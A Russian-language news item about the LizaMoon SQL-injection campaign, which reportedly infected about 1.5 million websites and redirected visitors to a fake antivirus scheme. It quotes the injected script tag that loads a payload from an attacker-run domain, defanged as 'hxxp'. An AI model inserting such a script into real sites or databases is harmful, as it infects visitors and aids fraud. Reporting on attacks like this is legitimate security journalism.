Атака LizaMoon заразила около 1,5 млн сайтов

Хакеры внедряют код на языке SQL в ссылки страниц и перенаправляют пользователей на фальшивый сайт

Более 1,5 млн сайтов по всему миру заразились в результате атаки вирусом, который встраивает в URL ссылки на вредоносный файл. Такова предварительная оценка масштабов атаки типа «SQL-внедрение», которую провели специалисты Websense Security. Эта американская лаборатория впервые заметила вредоносные файлы 29 марта.

Внедряемый файл меняет текстовые поля в базе данных и внедряет в них дополнительный фрагмент <script src=hxxp://lizamoon.com/ur.php></script>, который загружает с удаленного сервера вредоносную программу. Затем пользователей направляли сайт с фальшивыми антивирусными утилитами под названием Windows Stability Center. С него предлагалось за деньги загрузить антивирусное ПО. Microsoft отношения к этому сайту не имеет. Websense Security перечисляет несколько адресов с вредоносным файлом, на которые направляют пользователей.

Атака названа по имени вредоносного кода, который загружается в ссылки, — LizaMoon.

Специалисты Websense разглядели вредоносный код, в частности, на некоторых страниц музыкального магазина iTunes от компании Apple.